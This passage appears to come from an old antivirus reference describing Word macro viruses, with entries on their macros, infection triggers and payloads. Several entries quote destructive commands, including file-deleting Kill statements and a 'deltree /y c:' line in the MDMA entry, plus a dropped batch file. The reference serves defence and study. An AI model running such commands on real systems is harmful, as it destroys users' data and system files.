Place of origin: Russia
Date of origin: Summer 1996
Description:
MVDK does not generate ready-to-run viruses. It only creates
the source code, which is put into text format and saved in the
C:\ directory. Infected documents have to be created by the author
himself.
The function to infect the global template and documents is
placed in one main macro, named by the virus creator.
The AutoOpen macro is always present, while other infection
methods can be added (infection on FileOpen, FileNew and
FileSave).
MVDK offers various payloads:
1. deleting system files
2. saving files with a password (on certain date and time)
3. dropping a DOS based program (or virus)
As a result of the payloads, "FileSaveAs" and "PayLoad" can
also be present in the virus code.
[Word.Kompu.A]
Virus name: Word.Kompu.A
Virus Type: Word macro virus
Number of macros: 2
Encrypted: No
Macro names: AutoOpen, AutoClose
Size of macros: 517 Bytes
Place of origin: ?Russia?
Date of origin: Unknown
Payload: Yes
Seen In-The-Wild: No
Description:
Kompu infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are opened or closed.
On the 6th and 8th of each month, Kompu displays the
following message:
" Tahan kommi!, Mul on paha tuju! "
It then waits for an input from the user. To close the message
box, the user needs to enter the following text:
" komm "
Kompu also adds the following message to a printed
document:
" Naemm-Naemm-Naemm-Naemm-Amps-Amps-Amps-
Amps-Kloemps-Kroeoek! "
[Word.Lazy.A]
Virus name: Word.Lazy.A
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen, Lazy
Size of macros: 664 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Lazy infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
When Lazy triggers (Friday 13th), it sets a password to the
active document.
If you find a document with an unknown password, please
download a copy of WinWord Password Recovery Tool
(wwprt). It is available at: www.vdsarg.cow.
[Word.Lemon.A (aka Melon)]
Virus name: Word.Lemon.A (aka Melon)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen, Lemon (Melon)
Size of macros: 664 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Lemon.A infects the global template when an infected
document is opened. Further documents become infected
when they are also opened (AutoOpen).
When Lemon triggers (probability of 1/31), it displays the
following message:
" !!LEMON!!!!MELON!! "
" !!LEMON!!!!MELON!! "
[Word.Lemon.B]
Virus name: Word.Lemon.B
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 577 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: No
Seen In-The-Wild: No
Description:
Lemon.B infects the global template when an infected
document is opened. Further documents become infected
when they are also opened (AutoOpen).
Lemon.B removes "ExtrasMakro" to make recognition of an
infected document more difficult (called macro stealth
technique).
[Word.Lunch.A]
Virus name: Word.Lunch.A
Virus Type: Word macro virus
Number of macros: 3
Encrypted: No
Macro names: AutoOpen (FileSave), NEWAO, NEWFS
Size of macros: 1579 Bytes in .doc files
1718 Bytes in global template
Place of origin: Unknown
Date of origin: Unknown
Destructive: No
Seen In-The-Wild: No
Description:
Lunch infects the global template (normal.dot) when an
infected document is opened. The "AutoOpen" macro is
renamed to "FileSave" when Lunch infects the global
template. As a result, further documents become infected
when they are saved with the FileSave command.
When an infected document is saved at 12:01 pm, Lunch
displays the following message:
" !Whatya doin'here? Take a lunch break! "
[Word.Lunch.B]
Virus name: Word.Lunch.B
Virus Type: Word macro virus
Number of macros: 3
Encrypted: No
Macro names: AutoOpen (FileSave), NEWAO, NEWFS
Size of macros: 1375 Bytes in .doc files
1463 Bytes in global template
Place of origin: Unknown
Date of origin: Unknown
Destructive: No
Seen In-The-Wild: No
Description:
The difference between this new variant and the original
Lunch.A virus is that Lunch.B does not check for the presence
of the "FileOpen" and "AutoExit" macros. Instead it checks for
the presence of the "FileSave" macro before infecting the
global template (normal.dot).
For more information, please refer to the Lunch.A virus.
[Word.Maddog.A]
Virus name: Word.Maddog.A
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoOpen, AutoClose, AutoExec, FileClose,
AopnFinish, FcFinish
Size of macros: 4209 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: Yes
Common In-The-Wild: No
Description:
MadDog.A infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are opened and closed (FileClose). Upon
closing a document, MadDog.A saves various times to
"Temp.dot" and then saves the active document. It also
creates the following file in the active directory:
" Filename.dat "
When a user closes a document (AutoClose) between 8 and 9
PM, Maddog.A replaces the letter "e" with "a".
[Word.Maddog.B]
Virus name: Word.Maddog.B
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoOpen, AutoClose, AutoExec, FileClose,
AopnFinish, FcFinish
Size of macros: 4259 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
The difference between this new variant and the original
Maddog.A virus is that the code has been slightly modified.
MadDog.B infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are opened and closed (FileClose). Upon
closing a document, MadDog.B saves various times to
"Temp.dot" and then saves the active document. It also
creates the following file in the active directory:
" Filename.dat "
When a user closes a document (AutoClose) between 8 and 9
PM, Maddog.B replaces the letter "e" with "a".
[Word.MDMA.A (a.k.a. StickyKeys, MDMA_DMV)]
Virus name: Word.MDMA.A (a.k.a. StickyKeys, MDMA_DMV)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoClose
Size of macros: 1635 Bytes
Place of origin: USA
Date of origin: July 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
MDMA is the first macro virus that tries to work on Windows,
Windows 95, Macintosh and Windows NT. It can be a very
destructive virus, and Word users are strongly advised to
check their system with an up-to-date anti-virus program.
MDMA infects the global template (normal.dot) when an
infected document is opened and then closed. Further
documents become infected when they are closed ("AutoClose").
If an infected document is loaded on the first of each month,
MDMA activates its destructive payload. Due to a bug in the
code MDMA will always call the Windows 95 payload, even
though there are other payloads for other operating systems.
Below are all the payloads:
Windows:
--------
Kill "c:\shmk."; "deltree /y c:" is added to autoexec.bat
This will delete all the directories on the C:\ drive.
Windows NT:
-----------
Kill "*.*"; Kill "c:\shmk."
This will delete all the files on the C:\ drive
Macintosh:
----------
Kill MacID$("****")
This will delete all files on the hard drive.
Windows 95:
-----------
Kill "c" \shmk."; Kill "c:\windows\*.hlp";
Kill "c:\windows\system\*.cpl"
SetPrivateProfileString ("HKEY_CURRENT_USER\Control
Panel\Accessibility\Stickykeys", "On", "1", "")
SetPrivateProfileString
("HKEY_LOCAL_MACHINE\Network\Logon","ProcessLoginScript", "00","")
SetPrivateProfileString ("HKEY_CURRENT_USER\Control
Panel\Accessibility\HighContrst", "On", "1", "")
This will delete important Windows files.
MDMA will also display the following message:
" You are infected with MDMA_DMV. Brought to you by MDMA "
" (Many Delinquent Modern Anarchists). "
[Word.MDMA.B (a.k.a. StickyKeys, MDMA_DMV)]
Virus name: Word.MDMA.B (a.k.a. StickyKeys, MDMA_DMV)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoClose
Size of macros: 1635 Bytes
Place of origin: USA
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and the older
MDMA.A virus is that its payload is corrupted.
Microsoft Word does not care about corrupted macros,
therefore MDMA.B is still able to replicate.
MDMA.B infects the global template (normal.dot) when an
infected document is opened and then closed. Further
documents become infected when they are closed ("AutoClose").
[Word.MDMA.C (a.k.a. StickyKeys, MDMA_DMV)]
Virus name: Word.MDMA.C (a.k.a. StickyKeys, MDMA_DMV)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoClose
Size of macros: 1025 Bytes
Place of origin: USA
Date of origin: October 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and the older
MDMA.A virus is that the code was partially modified.
MDMA.C infects the global template (normal.dot) when an
infected document is opened and then closed. Further
documents become infected when they are closed ("AutoClose").
Upon closing a document after the 20th of each month,
MDMA.C triggers its destructive payload. It tries to delete the
following files:
C:\shmk.
all *.hlp (Help) files in the C:\Windows directory
all *.cpl files in the C:\Windows\System directory
Again, MDMA.C has a payload for the Macintosh, which is
never executed.
[Word.MDMA.D (a.k.a. StickyKeys, MDMA_DMV)]
Virus name: Word.MDMA.D (a.k.a. StickyKeys, MDMA_DMV)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoClose
Size of macros: 744 Bytes
Place of origin: USA
Date of origin: October 1996
Destructive: No
Common In-The-Wild: Yes
Description:
The main difference between this new variant and the older
MDMA.C virus is that some of the codes are missing.
MDMA.D infects the global template (normal.dot) when an
infected document is opened and then closed. Further
documents become infected when they are closed ("AutoClose").
While MDMA.C tries to delete certain files after the 20th of
each month, MDMA.D does not contain this destructive
payload. It only has a payload for the Macintosh, which is
never executed.
[Word.MDMA.E (a.k.a. StickyKeys, MDMA_DMV)]
Virus name: Word.MDMA.E (a.k.a. StickyKeys, MDMA_DMV)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoClose
Size of macros: 735 Bytes
Place of origin: USA
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and the older MDMA.D
virus is that some of the codes are missing.
MDMA.E infects the global template (normal.dot) when an infected
document is opened and then closed. Further documents become
infected when they are closed ("AutoClose").
While some other MDMA variants contain destructive payloads, MDMA.E
does not delete any files.
[Word.Mind.A (aka Puritan)]
Virus name: Word.Mind.A (aka Puritan)
Virus Type: Word macro virus
Number of macros: 6 or 1
Encrypted: No
Macro names: AOB, FSAB, Retro, Puritan, FileSaveAs, ToolsMacro
Size of macros: 5415 (Mind.A) or 753 (Mind.A1)
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Mind.A (Mind.A1) is another virus that is not capable of
infecting other documents. Therefore, it is highly unlikely that
people will run into infected documents with the Mind virus.
[Word.Mota.A]
Virus name: Word.Mota.A
Virus Type: Word macro virus
Number of macros: 5
Encrypted: Yes
Macro names: No2, AutoExec, AutoOpen, FileExit, FileSaveAs
Size of macros: 1578 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Mota infects the global template when an infected document is
opened. Further documents become infected when they are saved
(FileSaveAs).
Upon "FileExit", Mota disables the anti-virus protection of
Microsoft Word 7.0 and the warning message before saving
the global template (normal.dot).
When Microsoft Word is started (AutoExec) from an infected
global template, Mota adds the following text to the active
document:
" Mota grows.. "
[Word.Muck.A]
Virus name: Word.Muck.A
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
FileSaveAs
Size of macros: 5329 Bytes
Place of origin: Africa
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Muck infects the global template when an infected document is
opened. Further documents become infected when they are saved
(FileSave and FileSaveAs).
Muck is another virus that is not destructive, it just displays
the message " Muck " with a probability of 1/5.
Muck also contains a code from an ineffective macro anti-virus
solution. The macros "AutoClose", "AutoExit" and "AutoNew"
have been snatched from ScanProt.
[Word.Muck.B]
Virus name: Word.Muck.B
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
FileSaveAs
Size of macros: 2781 Bytes
Place of origin: Africa
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Muck.B infects the global template when an infected document
is opened. Further documents become infected when they are
saved (FileSave and FileSaveAs).
The main difference between this new variant and the original
Muck.A virus it that this new variant snatched other macros
from the ScanProt macro anti-virus solution (AutoClose and
AutoNew).
Muck.B is another virus that is not destructive, it just displays
the message " Muck " with a probability of 1/5.
[Word.Muck.C]
Virus name: Word.Muck.C
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
FileSaveAs
Size of macros: 4327 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Muck.C infects the global template when an infected document
is opened. Further documents become infected when they are
saved (FileSave and FileSaveAs).
The main difference between this new variant and the original
Muck.A virus it that Muck.C has some minor code changes.
The AutoClose and AutoNew macros are identical to the ones
found in Muck.B virus.
Muck.C is another virus that is not destructive, it just displays
the message " Muck " with a probability of 1/5.
[Word.Muck.D]
Virus name: Word.Muck.D
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
FileSaveAs
Size of macros: 1619 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Muck.D infects the global template when an infected document
is opened. Further documents become infected when they are
saved (FileSave and FileSaveAs).
The main difference between this new variant and the previous
Muck.A virus it that Muck.D has some minor code changes.
The AutoNew macro is new, while the AutoExit macro was
taken from the B variant.
Muck.D also exists as a Word 97 virus. It was converted
from an older version of Word (6.0 or 7.0) to Word 8.0!
Muck.D is another virus that is not destructive, it just displays
the message " Muck " with a probability of 1/5.
[Word.Muck.E]
Virus name: Word.Muck.E
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoOpen, AutoNew, AutoClose, AutoExit, FileSave
FileSaveAs
Size of macros: 1648 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Muck.E infects the global template when an infected document
is opened. Further documents become infected when they are
saved (FileSave and FileSaveAs).
The main difference between this new variant and the previous
Muck.B virus it that Muck.E has some minor code changes.
Muck.E is another virus that is not destructive, it just displays
the message " Muck " with a probability of 1/5.
[Word.NF.A (a.k.a. Names)]
Virus name: Word.NF.A (a.k.a. Names)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoClose, NF
Size of macros: 286 Bytes
Place of origin: USA
Date of origin: Summer 1996
Destructive: No
Common In-The-Wild: No
Description:
NF infects documents that are closed (AutoClose). Infected
documents are converted internally to templates which is very
common for macro viruses.
Upon infection, NF will display the following message at the
bottom of the screen:
" Traced! "
[Word.Niceday.A]
Virus name: Word.Niceday.A
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen, VOpen, AutoClose
Size of macros: 886 Bytes
Place of origin: Unknown
Date of origin: Unknown
Destructive: No
Seen In-The-Wild: No
Description:
Niceday infects the global template (normal.dot) when an
infected file is opened. Further documents become infected
when they are closed (AutoClose).
Niceday triggers every day of the year and displays the
following message:
" Have a Nice Day "
Niceday includes parts of the Concept virus. The "Payload"
macro is identical to the one located in the Concept.A virus.
[Word.Niceday.B]
Virus name: Word.Niceday.B
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen,
(VOpen, AutoClose)
Size of macros: 886 Bytes
Place of origin: Unknown
Date of origin: Winter 1996
Destructive: No
Seen In-The-Wild: No
Description:
Niceday.B infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
The main difference between this new variant and the previous
Niceday.A virus is that Niceday.B has some modified codes.
[Word.Niceday.C]
Virus name: Word.Niceday.C
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen,
(VOpen, AutoClose)
Size of macros: 886 Bytes
Place of origin: Unknown
Date of origin: Winter 1996
Destructive: No
Seen In-The-Wild: No
Description:
Niceday.C infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
The main difference between this new variant and the previous
Niceday.A virus is that Niceday.C has some corrupted codes.
[Word.Niceday.D]
Virus name: Word.Niceday.D
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen,
(VOpen, AutoClose)
Size of macros: 886 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Niceday.D infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
The main difference between this new variant and the previous
Niceday.A virus is that Niceday.D has a corrupted "Payload"
macro.
[Word.Niceday.E]
Virus name: Word.Niceday.E
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen,
(VOpen, AutoClose)
Size of macros: 886 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Niceday.E infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
The main difference between this new variant and the previous
Niceday.A virus is that Niceday.E has a corrupted "Payload"
and "AutoExit" macros.
[Word.Niceday.F]
Virus name: Word.Niceday.F
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen,
(VOpen, AutoClose)
Size of macros: 886 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: Yes
Description:
Niceday.F infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
The main difference between this new variant and previous
Niceday viruses is that Niceday.F has a differently corrupted
"AutoExit" macro.
[Word.Niceday.G]
Virus name: Word.Niceday.G
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen,
(VOpen, AutoClose)
Size of macros: 910 Bytes
Place of origin: Spain
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Niceday.G infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
The main difference between this new variant and previous
Niceday viruses is that Niceday.G has a different message.
It displays " Pepe Truene, The mooooooooore Faster" instead
of " Have a NiceDay!".
Niceday.G also has an additional comment in the "AutoClose"
macro.
[Word.Niceday.H]
Virus name: Word.Niceday.H
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen,
(VOpen, AutoClose)
Size of macros: 886 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Niceday.H infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
The main difference between this new variant and previous
Niceday viruses is that Niceday.H has a differently corrupted
"Payload" macro.
[Word.Niceday.I]
Virus name: Word.Niceday.I
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen,
(VOpen, AutoClose)
Size of macros: 886 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Niceday.I infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
The main difference between this new variant and previous
Niceday viruses is that Niceday.I has some differently
corrupted macros.
[Word.Niceday.J]
Virus name: Word.Niceday.J
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen,
(VOpen, AutoClose)
Size of macros: 886 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Niceday.J infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
The main difference between this new variant and previous
Niceday viruses is that Niceday.J has a differently
corrupted "Payload" macro.
[Word.Niceday.K]
Virus name: Word.Niceday.K
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen,
(VOpen, AutoClose)
Size of macros: 886 Bytes
Place of origin: Unknown
Date of origin: June 1997
Destructive: No
Seen In-The-Wild: No
Description:
Niceday.K infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
The main difference between this new variant and previous
Niceday viruses is that Niceday.K has a differently
corrupted "AutoExit" macro.
[Word.Niceday.L]
Virus name: Word.Niceday.L
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: VClose, Payload, AutoExit, AutoOpen,
(VOpen, AutoClose)
Size of macros: 909 Bytes
Place of origin: Unknown
Date of origin: June 1997
Destructive: No
Seen In-The-Wild: No
Description:
Niceday.L infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
The main difference between this new variant and the previous
Niceday.D virus is that Niceday.L has a different message.
It displays " Your files will be deleted in 24 hours " instead
of " Have a NiceDay!".
[Word.Niki.A]
Virus name: Word.Niki.A
Virus Type: Word macro virus
Number of macros: 6
Encrypted: Yes
Macro names: AutoExec, AutoOpen, FileApri, FileSalvaConNome,
StrumMacro, NiKi
Size of macros: 7939 Bytes
Place of origin: Italy
Date of origin: Unknown
Destructive: Yes
Seen In-The-Wild: No
Description:
Niki is another macro virus for the Italian version of Microsoft
Word.
Niki infects the global template (normal.dot) when an infected
document is opened. Further documents become infected
when they are opened (FileApri) and saved (FileSalvaConNome).
When the "NiKi" macro is activated, Niki deletes all .doc files
and all .dll files in the following directories:
C:\MSOFFICE
C:\WINDOWS\SYSTEM
[Word.Nikita.A and Word.Nikita.A1]
Virus name: Word.Nikita.A and Word.Nikita.A1
Virus Type: Word macro virus
Number of macros: 2 or 1
Encrypted: Yes
Macro names: AutoOpen, Fun
Size of macros: 1028 Bytes in .doc files
309 Bytes in global template
Place of origin: Unknown
Date of origin: Unknown
Destructive: Yes
Seen In-The-Wild: No
Description:
Nikita is a trojan, not a virus. It does not replicate.
Nikita activates when an infected document is opened. It
displays a face, with moving eyes and mouth, and the
following text:
" Hello Guys! Oh, please stay here and look! "
(the text is only available in the original trojanized document)
Upon activation, the "Fun" macro is saved in the global
template under the name "AutoOpen". Once a new document is opened
(from an infected document) the payload triggers and Nikita creates
files, slowly filling the hard drive. The files contain the
following text:
" Nikita (1997) Nightmare Joker [SLAM] "
[Word.NJ-WMDLK1.A (a.k.a. BlackKnight)]
Virus name: Word.NJ-WMDLK1.A (a.k.a. BlackKnight)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: DQEQDIDT, GPDRCQJZ
Size of macros: 3680 Bytes
Place of origin: Unknown
Date of origin: Unknown
Destructive: No
Seen In-The-Wild: No
Description:
NJ-WMDLK1.A infects the global template (normal.dot) when
an infected document is opened and the following key is
pressed:
" SPACE " assigned to the DQEQDIDT macro
Further documents become infected when " SPACE " is pressed
again.
NJ-WMDLK1.A is very obvious to the user. Whenever
" SPACE " is pressed, the letter " E " will appear and when
" E " is pressed, an empty space (spacebar function) will
appear.
This virus was distributed with NJ-WMDLK1.B and
NJ-WMDLK1.C inside a macro virus construction kit.
The kit is available in 5 different versions and is capable
of creating macro viruses and macro trojans.
[Word.NJ-WMDLK1.B (a.k.a. BlackEnd)]
Virus name: Word.NJ-WMDLK1.B (a.k.a. BlackEnd)
Virus Type: Word macro virus
Number of macros: 5
Encrypted: Yes
Macro names: AutoNew, AutoClose, AutoExec, AutoOpen, BlackEnd
Size of macros: 2102 Bytes
Place of origin: Unknown
Date of origin: Unknown
Payload: Yes
Seen In-The-Wild: No
Description:
NJ-WMDLK1.B infects the global template (normal.dot) when
an infected document is opened. Further documents become
infected when they are also opened (AutoOpen), closed
(AutoClose), Microsoft Word started (AutoExec), and when
a new file is created (AutoNew).
On May 22nd of each year, Nj-WMDLK1.B activates its
payload and inserts the following text to a newly created
template:
" You are infected with the BlackEbd Virus! [D.K.]
After that is creates the following batch file and launches it:
C:\DOSSYS.BAT
The file contains the following:
" echo off "
" doskey Fun=setver win.com 3.00 "
" echo off "
" Fun "
This virus was distributed with NJ-WMDLK1.A and
NJ-WMDLK1.C inside a macro virus construction kit. The kit
is available in 5 different versions and is capable of creating
macro viruses and macro trojans.
[Word.NJ-WMVCK2.B (Kit) (a.k.a. NJK-gen)]
Virus Kit Name: Word.NJ-WMVCK2.B (Kit) (a.k.a. NJK-gen)
Virus Type: Word macro virus
Size of macros: 264915 Bytes
Number of macros: 20
Place of origin: Germany
Date of origin: July 1996
Description:
This macro virus construction kit was the first one to appear
during the Summer of 1996. It was written in Germany and only
works with the German version of Microsoft Word.
All viruses, created with the kit, have the following common
characteristics:
1. Consist of 7 or 8 macros
2. 7 macros have fixed names
3. Last macro name is chosen by the user
The kit offers to drop 9 predefined DOS-based viruses upon
activation. Due to a bug in the macro code only the dropper
for the BOZA.C virus works. Boza.C is classified as an
intended virus and does not infect any user files. However,
the chance of corruption still exists.
All the viruses check the system time and if the value of the
second field is 10, the following text is added to the printed
document:
" Nightmare Joker's WMVCK "
The construction kit also offers to add some additional text to
the printed document. The construction kit user only needs to
type in the text when creating the virus.
Below are the viruses that can be created with the kit:
1. WMVCK.Casino - This variant will drop Casino.2330.
2. WMVCK.VLS - This variant will drop VCL.Markt.1533.
3. WMVCK.MTE - This variant will drop MTE.Shocker.
4. WMVCK.Sirius - This variant will drop Sirius.Alive.4608.
5. WMVCK.SMEG - This variant will drop SMEG.Queeg.
6. WMVCK.Tequila - This variant will drop Tequila.
7. WMVCK.VICE - This variant will drop VICE.05.Code.3952.
8. WMVCK.Uniform - This variant will drop Uniform.
9. WMVCK.Boza.C - This variant will drop Boza.
10. WMVCK.Tremor - This variant will drop Tremor.
11. WMVCK.NoDrop - This variant will not drop any virus.
[Word.NJ-WMDLK1.C (a.k.a. Grunt)]
Virus name: Word.NJ-WMDLK1.C (a.k.a. Grunt)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: XxGRUNTxX1, XxGRUNTxX2
Size of macros: 1461 Bytes
Place of origin: Unknown
Date of origin: Unknown
Destructive: No
Seen In-The-Wild: No
Description:
NJ-WMDLK1.C infects the global template (normal.dot) when
an infected document is opened and one of the following keys
is pressed:
" E " assigned to the XxGRUNTxX1 macro
" I " assigned to the XxGRUNTxX2 macro
Further documents become infected when again " E " or " I " is
pressed.
The following text can be found inside the virus:
" A Virus from Nightmare Joker's Demolition Kit! "
This virus was distributed with NJ-WMDLK1.A and
NJ-WMDLK1.B inside a macro virus construction kit. The kit
is available in 5 different versions and is capable of creating
macro viruses and macro trojans.
[Word.NJ-WMDLK1.D (a.k.a. Archie)]
Virus name: Word.NJ-WMDLK1.D (a.k.a. Archie)
Virus Type: Word macro virus
Number of macros: 5
Encrypted: Yes
Macro names: AutoNew, AutoClose, AutoExec, AutoOpen, BlackEnd
Size of macros: 2102 Bytes
Place of origin: Unknown
Date of origin: Unknown
Payload: No
Seen In-The-Wild: No
Description:
NJ-WMDLK1.D infects the global template (normal.dot) when
an infected document is opened. Further documents become
infected when they are also opened (AutoOpen), closed
(AutoClose), Microsoft Word started (AutoExec), and when a
new file is created (AutoNew).
This virus is another virus created with a macro virus
construction kit. The original kit is available in 5 different
versions and is capable of creating macro viruses and
macro trojans.
The following text can be found in the "Archie" macro:
" A Virus from Nightmare Joker's Demolition Kit! "
" Translated into English by Dark Night (VBB) "
[Word.Nomvir.A:De]
Virus name: Word.Nomvir.A:De
Virus Type: Word macro virus
Number of macros: 10
Encrypted: Yes
Macro names: AutoExec, AutoNew, AutoOpen, DateiSpeichern,
DateiSpeichernUnter, DateiBeenden, ExtrasOptionen,
DateiDokvorlagen, DateiDrucken, FuckIt,
Size of macros: 5660 Bytes
Place of origin: Germany
Date of origin: January 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Nomvir infects the global template (normal.dot) when a new
document is created (AutoNew) or Microsoft Word is started
(AutoExec). Further documents become infected when they
are saved with the DateiSpeichern or DateiSpeichernUnter
command.
Nomvir includes various destructive payloads. It tries to
replace words with the word "hell", deletes C:\Autoexec.bat
and C:\Config.sys, or adds the following text at the end of a
document:
" Fuck Microsoft & Bill Gates "
Other payloads are activated on the 23rd of each month,
Saturday 13th, January 1st and December 25th.
On these days it tries to delete the following files:
" C:\WINDOWS\USER.DAT "
" C:\WINDOWS\USER.DA0 "
" C:\WINDOWS\SYSTEM.DA0 "
" C:\WINDOWS\SYSTEM.DAT "
Novir.A does not activate its payloads if it finds the following
entry in the "Compatibility" section of WINI.INI:
Nomvir=0x0690690"
The following message is displayed when the Tools/Macro
menu is selected:
" Nicht genⁿgend Arbeitsspeicher ! "
(translated: Not enough memory)
Another message is displayed when the "DateiDokvorlagen"
menu is selected:
" Interner Fehler ! "
(translated: Internal Error)
[Word.Nomvir.B:De]
Virus name: Word.Nomvir.B:De
Virus Type: Word macro virus
Number of macros: 10
Encrypted: Yes
Macro names: AutoExec, AutoNew, AutoOpen, DateiSpeichern,
DateiSpeichernUnter, DateiBeenden, ExtrasOptionen,
DateiDokvorlagen, DateiDrucken, FuckIt,
Size of macros: 5660 Bytes
Place of origin: Germany
Date of origin: January 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Nomvir.B infects the global template (normal.dot) when a new
document is created (AutoNew) or Microsoft Word is started
(AutoExec). Further documents become infected when they
are saved with the DateiSpeichern or DateiSpeichernUnter
command.
The main difference between this new variant and the "A"
variant is that the "DateiDrucken" and "DateiBeenden"
macros are not corrupted anymore.
DateiBeenden (translated: FileClose) is responsible for another
new payload. With a chance of 20 percent, Nomvir.B adds a
password to the active document. This password is made up of 5
characters (iATeS) and another 6th character that is randomly chosen.
For more information, please refer to the Nomvir.A virus
description.
[Word.Nop.A:De]
Virus name: Word.Nop.A:De
Virus Type: Word macro virus
Number of macros: 2
Encrypted: No
Macro names: AutoOpen, NOP (DateiSpeichern)
Size of macros: 246 Bytes
Place of origin: Germany
Date of origin: Summer 1996
Destructive: No
Common In-The-Wild: Yes
Description:
NOP.A is a very primitive virus and has only very few necessary
commands in order to replicate. The only special characteristic
for the NOP virus is that it turns off the prompting of Word
before saving the global template (NORMAL.DOT).
When an infected document is opened, NOP transfers itself to
the global template and renames "NOP" into "DateiSpeichern".
Additional documents become infected when they are saved.
[Word.Nop.B:De]
Virus name: Word.Nop.B:De
Virus Type: Word macro virus
Number of macros: 2
Encrypted: No
Macro names: AutoOpen, NOP (DateiSpeichern)
